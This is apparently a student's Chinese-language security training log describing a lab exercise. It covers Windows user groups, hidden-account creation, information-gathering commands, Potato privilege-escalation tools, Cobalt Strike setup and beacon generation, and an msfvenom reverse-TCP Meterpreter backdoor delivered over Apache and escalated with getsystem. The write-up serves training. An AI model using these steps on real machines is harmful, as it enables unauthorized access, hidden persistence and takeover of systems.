网络空间安全实训日志day9

一.笔记

1.windows用户权限

System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等Administrators:管理员组,具有对计算机进行完全访问和操作的权限。

Users:用户组,一般用户的默认组别,拥有较低的系统权限。

Guests:访客组,可以访问计算机上的公共文件夹和打印机,但不能更改配置和安装程序。

Backup Operators:备份操作员组,允许用户备份和还原数据,但不能更改配置安装程序。

Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。

2.Windows计划任务

  • 新建
    schtasks /create /tn “My Daily Script” /tr C:\Scripts\MyScript.bat /sc daily /st 09:00 /rl HIGHEST /f

  • 查询指定名称计划任务
    schtasks /query | findstr “My Daily Script”

  • 删除指定名称计划任务
    schtasks /delete /tn “My Daily Script” /f

3.CobaltStrike4.8安装配置

连接

下载插件

4.msf

一句话命令下载msf

启动msf

5.wesng-master

用wes.py工具分析从虚拟机得到的systeminfo

得到其需要的补丁的信息,我们可以根据这些信息去攻击

二.作业

1.安装CS,写安装步骤

(1)安装

配置并启动连接证明安装成功

(2)安装步骤

下载CS压缩包并解压,解压完成可以看到Client和Server两个文件

将Server文件上传到云服务器中

在云服务器进入Server目录用chmod +x teamserver的命令给安装脚本设置执行权限

在云服务器运行 teamserver 脚本,并输入服务器的公网 IP 地址和密码

在本机进入Client文件点击运行Cobalt_Strike_CN.vbs

运行Cobalt_Strike_CN.vbs之后用服务器的公网 IP 地址和密码连接

连接进入后即可进行监听等各种操作

2.总结用户组和用户、windows信息搜集命令

(1)用户和用户组相关命令

  • 命令行创建用户,明文输入密码:net user 用户名 passadd

  • 删除用户:net user 用户名 del

  • 隐藏用户:

(在用户的后面加上$符号)net user 用户名$pass
  • 新建用户组:net localgroup 组名 /add

  • 删除用户组:net localgroup组名 /del

  • 添加用户到组:net localgroup 组名 用户名 /add

  • 从组中删除用户:net localgroup 组名 用户名 /del

  • 普通用户提权:(也即是将用户添加到管理员组中)net localgroup administrator 用户名 /add

(2)windows信息搜集命令

  • Systeminfo:显示系统的基本信息,包括操作系统版本、CPU、内存、磁盘空间、网络连接等

  • ipconfig:显示当前网络配置信息,包括IP地址、子网掩码、网关等

  • nslookup:查询DNS服务器或解析域名

  • netstat:显示活动的TCP连接、侦听的端口、以太网统计信息等

  • netstat -an:显示所有连接和监听端口的详细列表

  • regedit:打开注册表编辑器,用于高级系统配置和管理

  • secpol.msc:打开本地安全策略,用于管理安全设置和策略

3.总结手工提权思路,土豆提权

(1)手工提权思路

首先用systeminfo等命令收集目标机的系统信息

分析得到的信息,可以用wesng-master等工具,具体分析systeminfo得到目标机的补丁信息

利用需要的补丁来对应得到目标机存在的漏洞

攻击漏洞用相应的方法来进行手工提权

(2)土豆提权

一开始下了好几个各种土豆都无法提权,最后才发现没有用管理员powershell,,,在管理员终端运行.\GodPotato-NET35.exe,提权成功

更多的土豆:

[https://github.com/BeichenDream/BadPotato](https://github.com/BeichenDream/BadPotato" \t "_blank)

[https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato" \t "_blank)

[https://github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato" \t "_blank)

[https://github.com/klezVirus/CandyPotato](https://github.com/klezVirus/CandyPotato" \t "_blank)

[https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato" \t "_blank)

[https://github.com/S3cur3Th1sSh1t/MultiPotato](https://github.com/S3cur3Th1sSh1t/MultiPotato" \t "_blank)

[https://github.com/crisprss/RasmanPotato](https://github.com/crisprss/RasmanPotato" \t "_blank)

[https://github.com/wh0amitz/PetitPotato](https://github.com/wh0amitz/PetitPotato" \t "_blank)

[https://github.com/antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG" \t "_blank)

[https://github.com/BeichenDream/PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato" \t "_blank)

[https://github.com/Prepouce/CoercedPotato](https://github.com/Prepouce/CoercedPotato" \t "_blank)

4.用CS插件提权

首先在配置Server的主机上启动

打开CS用正确的用户名密码登录连接

配置监听

生成木马文件

在生成的时候选择刚刚建好的监听

点击生成的exe使目标机上线

上线后尝试自动提权,但是因为版本问题一直失败

把木马上传到虚拟机,点击使虚拟机上线

用插件提权虚拟机,成功

5.MSF提权

msfvenom 工具生成一个用于Windows平台的逆向TCP连接的Meterpreter后门

–platform windows:指定目标平台为Windows

-p windows/meterpreter/reverse_tcp:选择生成Meterpreter后门的payload类型,且为逆向TCP连接类型

LHOST=192.168.37.130:指定接收连接的主机IP地址

LPORT=5555:指定接收连接的端口号,即后门监听的端口号

复制木马文件到apache访问页,在kali linux上启动apache

主机访问相应页面并下载木马文件

启动msf,使用exploit/multi/handler模块,完成相应配置,并用java启动

在主机上启动下载的木马文件,在kali获取sessions进入会话,然后用 getsystem 命令来提升权限,可以看到提权成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值